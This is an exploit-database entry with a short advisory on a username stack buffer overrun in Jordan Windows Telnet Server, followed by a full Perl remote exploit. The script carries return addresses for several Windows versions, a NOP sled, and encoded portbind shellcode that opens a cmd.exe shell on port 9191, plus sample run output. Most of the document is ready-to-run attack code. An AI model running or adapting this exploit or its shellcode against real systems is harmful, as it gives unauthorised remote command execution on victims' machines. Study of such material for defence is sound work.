Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (1)

EDB-ID:

23491

CVE:


Author:

fiNis

Type:

remote

Platform:

Windows

Published:

2003-12-29

source: http://www.securityfocus.com/bid/9316/info

Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server. Due to a lack of bounds checking, when this username is copied into an insufficient reserved buffer in stack-based memory, data that exceeds the size of the buffer will overrun its bounds and corrupt adjacent memory. An attacker may exploit this condition to corrupt a saved instruction pointer for the vulnerable function. 

#!/usr/bin/perl

## __________               ___ ___
## \______   \__ __  ______/   |   \
##  |       _/  |  \/  ___/    _    \
##  |    |   \  |  /\___ \\         /
##  |____|_  /____//____  >\___|_  /
##         \/           \/       \/
##
## Jordan's Windows Telnet server version 1.0 remote exploit
## spawn cmd.exe on port 9191
## coded by 1dt.w0lf ... yeap just for fun and drill =)
## this code just C -> Perl port
## based on http://packetstormsecurity.nl/0401-exploits/wts_bo.c by by fiNis > fiNis[at]bk.ru
##
## !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
##
## Run exploit under command promt (Windows) or shell (*nix)!
## 
## C:\>r57jwt.pl 127.0.0.1 23 1
## [~] server : 127.0.0.1
## [~] port   : 23
## [~] target : 1
## [~] connecting to host...
## [+] connected
## [~] sending shellcode
## [+] shellcode sent
## [~] trying to connect on port 9191
## [+] shell spawned on port 9191 ... you are lucky =)
##
## !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

use IO::Socket;

if (@ARGV < 3)
{
print "\n";
print "Jordan's Windows Telnet server version 1.0 exploit\n";
print "usage: $0 <host> <port> <target>\n";
print "\ntargets:\n";
print " 1 - 0x773C4540 - winXP sp0\n";
print " 2 - 0x77fb59cc - winXP sp1\n";
print " 3 - 0x77e3cb4c - Windows 2000 SP1\n";
print " 4 - 0x77e2492b - Windows 2000 SP2\n";
print " 5 - 0x77e2afc5 - Windows 2000 SP3\n";
print " 6 - 0x77e14c29 - Windows 2000 SP4\n";
print " 7 - 0x77f0eac3 - Windows NT sp6\n";
print " 8 - 0x7fdabfa9 - Windows 98 SE\n";
print " 9 - 0xAAAAAAAA - dos\n";
print "\n";
exit(1);
}

$server = $ARGV[0];
$port = $ARGV[1];
$target = $ARGV[2];

## targets ##

if($target==1){$ret = 0x773C4540;} # winXP sp0 shell32.dll jmp esp
if($target==2){$ret = 0x77fb59cc;} # winXP sp1
if($target==3){$ret = 0x77e3cb4c;} # Windows 2000 SP1
if($target==4){$ret = 0x77e2492b;} # Windows 2000 SP2
if($target==5){$ret = 0x77e2afc5;} # Windows 2000 SP3
if($target==6){$ret = 0x77e14c29;} # Windows 2000 SP4
if($target==7){$ret = 0x77f0eac3;} # Windows NT sp6
if($target==8){$ret = 0x7fdabfa9;} # Windows 98 SE
if($target==9){$ret = 0xAAAAAAAA;} # dos

print "\n";
print "[~] server : $server\n";
print "[~] port   : $port\n";
print "[~] target : $target\n";
print "\n";

$nop_zone="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

## 512 bytes jff code ... little lolz shit
$jff_code="\x72\x35\x37\x2E\x62\x6C\x61\x68\x2E\x62\x6C\x61\x68\x2E\x68\x61\x68\x61\x5F\x63\x6F\x64\x65\x2E\x6A\x75\x73".
          "\x74\x2E\x66\x6F\x72\x2E\x66\x75\x6E\x2E\x2E\x2E\x74\x68\x69\x73\x2E\x69\x73\x2E\x6E\x6F\x74\x2E\x6E\x65\x65".
          "\x64\x2E\x66\x6F\x72\x2E\x67\x6F\x6F\x64\x2E\x77\x6F\x72\x6B\x2E\x2E\x2E\x62\x75\x74\x2E\x2E\x2E\x2E\x77\x68".
          "\x79\x2E\x6E\x6F\x74\x3F\x2E\x2E\x63\x72\x65\x61\x74\x65\x64\x2E\x62\x79\x2E\x31\x64\x74\x2E\x77\x30\x6C\x66".
          "\x2E\x31\x33\x2E\x30\x31\x2E\x32\x30\x30\x34\x2E\x66\x6F\x72\x2E\x6C\x69\x74\x74\x6C\x65\x2E\x6C\x61\x6D\x65".
          "\x2E\x78\x70\x6C\x6F\x69\x74\x2E\x2E\x79\x65\x61\x70\x2E\x2E\x74\x68\x69\x73\x2E\x65\x78\x70\x6C\x6F\x69\x74".
          "\x2E\x66\x6F\x72\x2E\x65\x64\x75\x63\x61\x74\x69\x6F\x6E\x73\x2E\x6F\x6E\x6C\x79\x2E\x2E\x2E\x66\x75\x6C\x6C".
          "\x79\x2E\x77\x6F\x72\x6B\x2E\x2E\x2E\x74\x65\x73\x74\x65\x64\x2E\x6F\x6E\x2E\x77\x69\x6E\x78\x70\x2E\x2E\x77".
          "\x69\x74\x68\x6F\x75\x74\x2E\x61\x6E\x79\x2E\x73\x65\x72\x76\x69\x63\x65\x2E\x70\x61\x63\x6B\x73\x2E\x2E\x63".
          "\x61\x6E\x2E\x77\x6F\x72\x6B\x2E\x6F\x6E\x2E\x6F\x74\x68\x65\x72\x2E\x76\x65\x72\x73\x69\x6F\x6E\x73\x2E\x6F".
          "\x66\x2E\x6D\x65\x6C\x63\x6F\x24\x6F\x66\x74\x2E\x77\x69\x6E\x64\x6F\x77\x24\x2E\x2E\x62\x75\x74\x2E\x69\x27".
          "\x6D\x2E\x64\x6F\x6E\x27\x74\x2E\x68\x61\x76\x65\x2E\x61\x6E\x79\x2E\x74\x69\x6D\x65\x2E\x66\x6F\x72\x2E\x74".
          "\x65\x73\x74\x2E\x69\x74\x2E\x2E\x3D\x28\x2E\x2E\x77\x65\x6C\x6C\x2E\x2E\x2E\x77\x65\x6C\x6C\x2E\x2E\x2E\x77".
          "\x65\x6C\x6C\x2E\x2E\x2E\x76\x69\x73\x69\x74\x2E\x6F\x75\x72\x2E\x73\x69\x74\x65\x3A\x68\x74\x74\x70\x3A\x2F".
          "\x2F\x72\x73\x74\x2E\x76\x6F\x69\x64\x2E\x72\x75\x2E\x2E\x6F\x72\x2E\x2E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77".
          "\x77\x2E\x72\x73\x74\x65\x61\x6D\x2E\x72\x75\x2E\x2E\x2E\x77\x65\x2E\x67\x6C\x61\x64\x2E\x74\x6F\x2E\x73\x65".
          "\x65\x2E\x79\x6F\x75\x2E\x2E\x2E\x2E\x61\x6E\x64\x2E\x73\x6F\x72\x72\x79\x2E\x66\x6F\x72\x2E\x6D\x79\x2E\x65".
          "\x6E\x67\x6C\x69\x73\x68\x2E\x2E\x3D\x28\x2E\x2E\x2E\x2E\x2E\x2E\x2E\x61\x6E\x64\x2E\x2E\x2E\x2E\x2E\x48\x41".
          "\x56\x45\x2E\x41\x2E\x4E\x49\x43\x45\x2E\x44\x41\x59\x2E\x2E\x2E\x2E\x2E\x2E\x2E\x65\x6E\x6A\x6F\x79\x2E";

## 484 bytes win32 portbind shellcode, spawn cmd.exe on port 9191
$shell_code="\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA".
"\xDD\x03\x64\x03\x7C\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89".
"\x88\x88\x01\xCE\x4E\xE0\xBB\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77\xFE\x74\xE0\x25\x51\x8D\x46".
"\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77\xFE\x74\xE0\x67\x46".
"\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77\xFE\x70\xE0".
"\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77\xFE".
"\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A".
"\x77\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88".
"\x77\xDE\x7C\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77".
"\xDE\x64\xDF\xDB\x77\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C".
"\x24\x05\xB4\xAC\xBB\x48\xBB\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5\x01\xDC\xAC\xC0\x01\xDC\xAC".
"\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE\x46\x03\x44\xE2\x77".
"\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8\x84\x03\xF8".
"\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90\x03".
"\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3".
"\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D".
"\xD7\xD6\xD5\xD3\x4A\x8C\x88";

$pack_ret = pack('l', ($ret));

$buffa .= $jff_code;
$buffa .= $pack_ret;
$buffa .= $nop_zone;
$buffa .= $shell_code;

print "[~] connecting to host...\n";

$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp) || die "[-] connect failed\n";
print "[+] connected\n";
sleep 1;
print "[~] sending shellcode\n";
print $socket "$buffa";
sleep 1;
print "[+] shellcode sent\n";
close($socket);

print "[~] trying to connect on port 9191\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "9191", Photo => tcp) || die "[-] damn ... connect to spawn shell failed\n";
close($socket);
print "[+] shell spawned on port 9191 ... you are lucky =)\n";